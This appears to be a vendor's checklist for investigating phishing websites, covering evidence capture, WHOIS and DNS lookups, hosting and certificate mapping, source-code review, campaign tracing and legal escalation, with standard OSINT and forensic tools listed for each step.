Phishing Page Investigation – Complete OSINT & Forensic Workflow

This guide describes a full, field-ready workflow for investigating phishing websites — including evidence preservation, offline analysis, DNS/IP intelligence, infrastructure mapping, source-code inspection, campaign analysis, and final documentation.

1. Evidence Collection (if the phishing page is still active)

☐ Perform a full website capture Tools: HTTrack, Wget, Burp Suite, Wayback Machine

☐ Save HTML, JS, CSS, favicon, images Tools: Manual export, HTTrack, Developer Tools → “Save all resources”

☐ Capture full-page screenshots including URL & HTTPS lock Tools: Firefox Developer Tools, Chrome DevTools

☐ Record timestamp, client IP, User-Agent Tools: Burp Suite, Wireshark

☐ Capture network traffic during form submission Tools: Wireshark, Burp Suite, Fiddler

☐ Store DNS records of the domain Tools: dig, nslookup, ViewDNS.info, SecurityTrails

2. Offline Analysis of the Phishing Website

☐ Check archival services for past snapshots Tools: archive.org, cachedview.com, urlscan.io, VirusTotal

☐ Extract metadata, external links, redirects Tools: urlscan.io, VirusTotal (URL report)

☐ Perform WHOIS lookup (registrar, creation date, contacts) Tools: DomainTools WHOIS, ICANN Lookup

☐ Retrieve historical DNS data Tools: SecurityTrails, PassiveTotal, RiskIQ

3. IP Address & Hosting Infrastructure

☐ Identify IP geolocation & hosting provider Tools: IPinfo.io, MaxMind GeoIP, ip-api.com

☐ Reverse IP lookup (other domains on same host) Tools: SecurityTrails, ViewDNS.info, Shodan

☐ Map infrastructure connections: hosting, certificates, fingerprints Tools: Censys, crt.sh, Shodan Certificates

4. Technical Source-Code Analysis

☐ Inspect where the form submits stolen data Tools: Browser Developer Tools (Network tab), Burp Suite

☐ Search for webhooks, email addresses, comments Tools: Manual review of HTML, JS, inline scripts

☐ Identify tech stack / CMS / platform Tools: WhatCMS.org, Wappalyzer

5. Abuse of Third-Party Services

☐ Check for Google Ads abuse, Telegram bots, free hosts Tools: Google Transparency Report, Telegram Bot DB, AbuseIPDB

☐ Detect use of compromised legitimate sites Tools: urlscan.io, PublicWWW.com

6. Campaign Analysis (Distribution Vectors)

☐ Analyze phishing emails or SMS messages Tools: Email header analyzers, MXToolbox, mail-tester.com

☐ Check if phishing was delivered via social media or URL shorteners Tools: CheckShortURL, unshorten.it, VirusTotal URL scan

7. Forensic & OSINT Correlation

☐ Cross-check infrastructure via OSINT search engines Tools: Spyse, Shodan, Censys, GreyNoise

☐ Detect reused phishing templates, code reuse, repeated domains Tools: PublicWWW, urlscan.io “Similarity” feature

☐ Investigate dark web connections or sale of phishing kits Tools: ahmia.fi, Onion search engines (Tor required)

8. Documentation & Legal Steps

☐ Export all artefacts Tools: Local storage, forensic imaging tools

☐ Build a complete timeline of the phishing operation Tools: Maltego, Timeline JS, Obsidian graphs

☐ Request data from registrar / hosting provider / Google Tools: Official LEA procedures and legal requests

Summary

This workflow ensures you:

• preserve evidence safely
• analyze the phishing site offline
• map the infrastructure
• correlate OSINT data
• track distribution vectors
• document the campaign
• escalate legally if needed

It covers technical, forensic, and intelligence aspects of phishing investigations and integrates directly with SystemLog’s OSINT and Forensics methodologies.